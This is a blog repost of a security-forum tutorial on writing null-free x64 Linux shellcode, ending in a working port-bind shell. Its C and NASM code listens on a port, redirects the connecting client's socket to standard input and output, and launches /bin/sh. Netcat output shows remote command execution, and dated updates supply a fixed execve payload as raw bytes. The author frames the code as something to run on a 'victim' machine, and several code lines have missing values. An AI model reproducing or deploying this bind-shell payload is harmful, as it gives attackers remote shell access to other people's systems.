Due to the lack of availability of info on the topic I've decided to re-post this on my blog, I feel it's something I'd like to look back to if I need it:
Initially before writing this I thought to myself that because I had worked really hard on this matter (give or take about two weeks or so of constant hammering), I have just opened doors that were previously closed to me due to the passage of time and how things change. But I was convinced that what this community stands for, and how without it and someone there to guide me on this journey I'd be lost as hell. So I figured I'd give back by sharing what I've learned recently, which is creating shellcode for a portbind attack... however, the difference between what is commonly used to make it and my version of doing so, is that I use a more logical and concise method of doing it. To preface this I'm going to assume that you know x64 ASM, C network programming, and the basics of using Linux. I am also trusting that this post stays within the Soldierx community, I strongly support this community and hope to see its members cherish from this information.
If you don't know x64 ASM, I would recommend using Ray Seyfarth's Intro to x64 on Linux (and Windows for future projects):
https://www.amazon.com/s/ref=dp_byline_sr_book_1?ie=UTF8&text=Ray+Seyfar...
If you don't know C network programming I highly recommend Linux Socket Programming By Example by Warren Gay:
https://www.amazon.com/Linux-Socket-Programming-Example-Warren/dp/078972...
A lot of sources that refer to shellcode and assembly tend to be outdated and that is the biggest obstacle when reading something like the shellcoder's handbook, and often times a lot of techniques used don't work. There is a massive change in how the processor interprets shellcode now in our x64 age than it used to in x32 predecessor due to the way opcodes are interpreted and how the circuits for the AMD architecture have evolved. Why Shellcode? Because you can attach shellcode to a running process on the victim's machine, how to do this, I'll save for another time. The first thing you can start with in all of this is a simple Hello World in C:
int main(int argc, char **argv)
{
write(1, "Hello, World!", 12);
}
Now if you copy and compile this using gcc and run the resulting a.out file you'll get the infamous hello world. But what you should be asking is why did I write it like this? No headers included or anything? The reason is because I am using what is known as a system call. Unlike write(), printf() is not something that is understood by the processor, instead printf() is something that is added by the GNU C Compiler to work with write() as well as other methods of aligning data to a string. Syscalls have individual values to them from 0 to 1024 and are contained in a header file titled unistd.h . Within Ubuntu, which is what I'm using the real name of this header file is unistd_64.h, and that's because 32 and 64 bit operating system versions have different values for individual syscalls. To find out where your unistd file is, simply use the find command to look for it and concatenate it in terminal:
find /usr/include -name unistd.h
cat <what you get here>
You can also look for syscall values on the internet for example on this page:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
So lets use what we know to write our hello world script using assembly using the write syscall:
section .data
msg db "hello, world!"
section .text
global _start
_start:
mov rax, 1
mov rdi, 1
mov rsi, msg
mov rdx, 13
syscall
mov rax, 60
mov rdi,
syscall
using nasm to compile it and ld to link the resulting object file:
nasm -f elf64 -g hello.asm
ld -o hello hello.o
./hello
Should print out Hello world. Then you can objdump it to disassemble out the resulting shellcode:
$objdump -d hello
hello: file format elf64-x86-64
Disassembly of section .text:
00000000004000b0 <_start>:
4000b0: b8 01 00 00 00 mov $0x1,%eax
4000b5: bf 01 00 00 00 mov $0x1,%edi
4000ba: 48 be d8 00 60 00 00 movabs $0x6000d8,%rsi
4000c1: 00 00 00
4000c4: ba 0d 00 00 00 mov $0xd,%edx
4000c9: 0f 05 syscall
4000cb: b8 3c 00 00 00 mov $0x3c,%eax
4000d0: bf 00 00 00 00 mov $0x0,%edi
4000d5: 0f 05 syscall
^ shellcode ^
The problem with this shellcode is that it has too many of what we call null bytes present. What happens is that nullbytes end up cancelling out the effects of shellcode and the processor interprets them as EOF calls for our program. Ah I should add on that shellcode are the individual hex values for the processor to interpret what the program is doing for example take the first mov instruction:
\xb8\x01 ---gets interpreted by processor as --> 1011 1000 0000 0001 --to processor-->\xb8\ tells the processor you want to mov to register rax, \x01 tells the processor you want to move the value of 0x1 to it.
the extra 00s you see are a result of the entire 64 bit long register being used, which leads to me showing you this:
https://imgur.com/a/rWUz75J
There are four ways to get rid of null bytes, and I will show you how the first three are done after explaining them:
1-push the value into the stack and pop it into the register
2-move the value into the first 8 bits (or 1 byte) of the register
3-using the jump and call trick
4-for strings, write each character using ascii hex characters into the appropriate registers
And here's our hello world without all the null bytes:
global _start
section .text
_start:
jmp short data
shellcode:
xor rax,rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
mov al, 1 ;1-moving into lowest byte of register
push byte 1 ;2-pushing the value into stack
pop rdi ;2-and then popping it
pop rsi ;3-popping the address of msg from stack
mov dl, 13 ;1-m
syscall
mov al, 60
mov dil, 1
syscall
data:
call shellcode
msg db "Hello, World!"
Now compile it like before and objdump it:
$ objdump -d hello
hello: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: eb 1d jmp 40009f <data>
0000000000400082 <shellcode>:
400082: 48 31 c0 xor %rax,%rax
400085: 48 31 ff xor %rdi,%rdi
400088: 48 31 f6 xor %rsi,%rsi
40008b: 48 31 d2 xor %rdx,%rdx
40008e: b0 01 mov $0x1,%al
400090: 6a 01 pushq $0x1
400092: 5f pop %rdi
400093: 5e pop %rsi
400094: b2 0d mov $0xd,%dl
400096: 0f 05 syscall
400098: b0 3c mov $0x3c,%al
40009a: 40 b7 01 mov $0x1,%dil
40009d: 0f 05 syscall
000000000040009f <data>:
40009f: e8 de ff ff ff callq 400082 <shellcode>
00000000004000a4 <msg>:
4000a4: 48 rex.W
4000a5: 65 6c gs insb (%dx),%es:(%rdi)
4000a7: 6c insb (%dx),%es:(%rdi)
4000a8: 6f outsl %ds:(%rsi),(%dx)
4000a9: 2c 20 sub $0x20,%al
4000ab: 57 push %rdi
4000ac: 6f outsl %ds:(%rsi),(%dx)
4000ad: 72 6c jb 40011b <msg+0x77>
4000af: 64 fs
4000b0: 21 .byte 0x21
And it's free of null bytes!
Now all you have to do is extract and test the shellcode, to do this I've made a simple bash script from a command written by someone else on the internet that uses one command to extract the code of the objdump you can save this and chmod +x it so that it becomes a shell executable:
#!/bin/bash
PROGRAM=$1
objdump -d ./${PROGRAM}|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
save this into a file and chmod it then run it with the hello program to get:
$ ./extract-shell hello
"\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21"
Then copy and paste this into our C code to test the shellcode itself (I named mine test.c):
char code[]="\xeb\x1d\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x48\x31\xf6\x5e\x48\x31\xd2\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Compile this code and run it like so (note if you get an error for execstack, you can install it on ubuntu using sudo apt install execstack:
$gcc -fno-stack-protector -z execstack test.c
$./a.out
Hello,World!
So now that you know how to write shellcode, next step is learning it to do something useful like making port binding shellcode. The theory is very simple, your shellcode will simply bind your socket to an ip address and port, in which you then duplicate the client socket to to your stdin, stdout, and stderr file descriptors, that way when you for example execute a write syscall, instead of going through your stdout file descriptor, it instead goes to the client socket file descriptor.
1)victim becomes a server<----you connect to the victim that has this shellcode --- hacker
2)you use a execve syscall to start a shell
Heres a C code I wrote for it, in this case I'm using my private ip of 192.168.1.16 and port 1234 as the target (this is my private ip):
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdio.h>
int main()
{
// Create the socket (man socket)
// AF_INET for IPv4
// SOCK_STREAM for TCP connection
int host_sock = socket(AF_INET, SOCK_STREAM, ); //<--0 after the comma
// Create sockaddr_in struct (man 7 ip)
struct sockaddr_in host_addr;
host_addr.sin_family = AF_INET;
host_addr.sin_port = htons(1234);
host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");
// Bind address to socket (man bind)
bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
// Use the created socket to listen for connections (man listen)
listen(host_sock, ); //<---0 after the comma
// Accept connections, (man 2 accept) use NULLs to not store connection information from peer
int client_sock = accept(host_sock, NULL, NULL);
// Redirect stdin, stdout, stderr to client
dup2(client_sock, ); //<---0 after the comma
dup2(client_sock, 1);
dup2(client_sock, 2);
// Execute /bin/sh (man execve)
execve("/bin/sh", NULL, NULL);
}
When you compile and run this it stands on standby until the hacker connects to it, in this case I'm going to use netcat which is a program that comes on most Linux systems and I believe in older versions of windows, in order to connect to the victim:
$nc 192.168.1.16 1234
echo hello!
hello!
id
uid=1000(ghost) gid=1000(ghost) groups=1000(ghost),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),128(kvm),129(ubridge),132(libvirt)
Now to try and write the shellcode for this, is harder than writing the assembly for it. So what I did that distinguishes this post from anything else available in the 4% of the internet that we can see, is that I used a C style struct in the assembly (No C involved I promise), and used logical methods of executing syscalls that correlates with the way I've written it in the C code using no fancy assembly instructions or methods of filling in the blanks:
segment .data
;struct sockaddr_in host_addr;
;host_addr.sin_family = AF_INET;
;host_addr.sin_port = htons(1234);
;host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");
struc sockaddr_in
sin_family resw 1 ;allocate 2 bytes
sin_port resw 1 ;allocate 2 bytes
sin_addr resd 1 ;allocate 4 bytes (for 32 bit address)
sin_zero resb 8 ;allocate 8 bytes (for the 0 padding)
endstruc
host_addr istruc sockaddr_in
at sin_family, dw 0x02
at sin_port, dw 0xd204 ;port 1234 hex translates to 4d2 written in host byte order
at sin_addr, dd 0x1001A8C0 ;address 192.168.1.16
at sin_zero, db
iend
msg db "got here"
bin db "/bin/sh"
segment .text
global _start
_start:
;sock= socket(AF_INET, SOCK_STREAM, 0)
mov rax,41
mov rdi,2 ; got these values from the socket.h header file can use find /usr/include -name socket.h to find it
mov rsi,1
syscall
mov rbx,rax ;save the fd!
;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,49 ;load the syscall value for bind
mov rdi,rbx ;load the file descriptor we saved earlier
mov rsi,host_addr ;load the address of the struct
mov rdx,16 ;the size is 16 bytes
syscall
cmp rax,
jl exit
;listen(host_sock, 0);
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,50 ;load the syscall value for listen
mov rdi,rbx ;load the file descriptor
syscall
;int client_sock = accept(host_sock, NULL, NULL);
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,43 ;load the syscall value for accept
mov rdi,rbx ;load the file descriptor
syscall
mov rcx,rax ;save the client file descriptor
;duplicate the file descriptors into stdin, stdout,stderr
xor rax,rax
xor rdi,rdi
xor rsi,rsi
mov rax, 33
mov rdi, rcx
mov rsi,
syscall
xor rax,rax
mov rax, 33
mov rsi, 1
syscall
xor rax,rax
mov rax, 33
mov rsi, 2
syscall
;and finally execute /bin/sh
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,59
mov rdi,bin
syscall
;print got here (for debugging purposes)
xor rax, rax
mov rax,1
xor rdi, rdi
mov rdi,1
xor rsi,rsi
mov rsi, msg
mov rdx, 8
syscall
exit:
;exit
xor rax,rax
mov rax,60
xor rdi,rdi
syscall
If you need help understanding how I wrote my structure, you can check out this other post I made on the programming forums here:
https://www.soldierx.com/bbs/201809/Using-structures-NASM-x64-Assembly
See the way this works is you have to know that the sockaddr_in struct is 16 bytes in length. Go over the 16 bytes and your address wont be properly filled, go too low and you end up with a segmentation fault when the bind() syscall gets executed. after that, the rest is just filling in the blanks for the individual syscalls, and as you write this, you can test out how the settings will work out using the strace program as you go to see how each syscall is being filled out and keeping in mind that 1) returned values go into rax, and 2) that each syscall has a return value to it:
$ strace -e socket,bind,listen,accept,dup2 ./portbindasm
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) =
listen(3, ) =
accept(3, NULL, NULL) = 4
dup2(4, ) =
dup2(4, 1) = 1
dup2(4, 2) = 2
----should pause here if everything goes smoothly---
+++ exited with +++
And with that I'm going to stop here and let you, the reader, figure out how to write the shellcode for this. Until next time thanks for reading!
-------------------------------------[UPDATE:9/28/18]-----------------------------------------------------------------------------------------
So I have to admit before testing this I had a working theory that my assembly code would work without the null bytes, and after writing my iteration of it, it did; then a new problem arose, when you insert it into the C code to test the null byte free shellcode, the strace ended up showing a lot of garbage values, and where the structure for the address and everything else would be filled in, nothing would get filled out correctly in its execution. For instance,
the socket and bind syscalls would turn out as:
socket(AF_INET, SOCK_DGRAM|SIGEV, 0xffffffffffffffffff63) = -1 [ERROR BAD ADDRESS]
bind(243, {sa_family=AF_INET, sin_port=htons(56865), sin_addr=inet_addr(0xfffffffffffffff2131123213)}, 16) = -1
As a result I went ahead and did things the traditional way, in which instead of defining the sockaddr_in structure the way I did previously, I pushed the values into stack and pointed the address of the stack to the register that would hold the pointer to the values within the stack as shown below:
segment .text
global _start
_start:
;sock= socket(AF_INET, SOCK_STREAM, 0)
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
xor rdx,rdx
syscall
mov rbx,rax ;save the fd!
;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
mov al,49 ;load the syscall value for bind
mov dil,bl ;load the file descriptor we saved earlier
;build the sockaddr struct
push dword 0x1001A8C0;push my ip address into stack
push word 0xd204 ;push my port into stack
push word 2 ;push the value for AF_INET
mov rcx,rsp ;move the stack pointer into rcx
mov rsi,rcx ;move rcx into the second argument of bind()
mov dl,16 ;the size is 16 bytes
syscall
;listen(host_sock, 0);
xor rax,rax ;zero out the argument registers
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov al,50 ;load the syscall value for listen
mov dil,bl ;load the file descriptor
syscall
;int client_sock = accept(host_sock, NULL, NULL);
xor rax,rax ;zero out the argument registers
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov al,43 ;load the syscall value for accept
mov dil,bl ;load the file descriptor
syscall
mov cl,al ;save the client file descriptor
;duplicate the file descriptors into stdin, stdout,stderr
xor rax,rax ;zero out the argument registers
xor rdi,rdi
xor rsi,rsi
mov al, 33
mov dil, cl
syscall
xor rax,rax
mov al, 33
mov sil, 1
syscall
xor rax,rax
mov al, 33
mov sil, 2
syscall
;finally execute execve (where the problem is)
xor rax,rax
push rax
xor rdx,rdx
xor rsi,rsi
mov rbx,0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al,0x3b
syscall
;exit
xor rax,rax
mov al,60
xor rdi,rdi
syscall
And after putting it in the shellcode generated for this in the test code created in C, the problem is in the execve call, where what should be "/bin/sh" turns into "/bin/shS", meaning 1 byte, is getting in the way of this finally executing:
$ strace -e socket,bind,accept,dup2,execve ./a.out
execve("./a.out", ["./a.out"], 0x7fffa9515d50 /* 58 vars */) =
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) =
accept(3, NULL, NULL) = 4
dup2(4, ) =
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/shS", NULL, NULL) = -1 ENOENT (No such file or directory) <------------problem
^
I have tried a lot of the things spread around within the internet, at this point I'm thinking that it could be Ubuntu, if you guys find anything that can make it work feel free to reply but until I can figure out how to fix this, all I can do is apologize and keep trying to look for a solution.
-------------------------------------[UPDATE:9/29/18]-----------------------------------------------------------------------------------------
ALAS, I have found the persistent problem with my code, the issue was that execve was getting the wrong info from the shellcode. I was puzzled by the fact that when I tried solutions to the execve problem, by rewriting the exact same x64 codes and running them the way I showed in this tutorial, the codes ended up in execve turning up with an iteration of "/bin/sh" that didn't work. So I figured, what if I copy and paste the shellcode on the website on exploit DB, and it worked, and the guy showed the objdump of the execve file along with it! Then it hit me, what if my shellcode wasn't being extracted correctly this whole time, and that was exactly the case! Here I'll show you:
$ objdump --disassemble execve
execve: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor %rax,%rax
400083: 50 push %rax
400084: 48 31 d2 xor %rdx,%rdx
400087: 48 31 f6 xor %rsi,%rsi
40008a: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
400091: 2f 73 68
400094: 53 push %rbx
400095: 54 push %rsp
400096: 5f pop %rdi
400097: b0 3b mov $0x3b,%al
400099: 0f 05 syscall
$ ./extract-shell execve
"\x48\x31\xc0\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
^if you notice, after \xbb\x2f there should be another \x2f
The idea of the execve shellcode is to run either "\\bin\sh" or "\bin\\sh" because this way the entire memory location gets filled upon pushing the buffer onto the stack. Keep in mind that I use an AMD FX 4300 processor, so I don't know if stack frames have more than 32 bits in length in modern intel processors, but to keep things simple, yes my stack memory locations are 32 bits long each; regardless, execve is built to handle our little "typo". So to fix this problem you could simply add the extra \x2f and testing the resulting shellcode then gives:
$ strace -e socket,dup2,accept,bind,execve ./a.out
execve("./a.out", ["./a.out"], 0x7fffffffdfd0 /* 58 vars */) =
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) =
accept(3, NULL, NULL) = 4
dup2(4, ) =
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("//bin/sh", NULL, NULL) =
Success!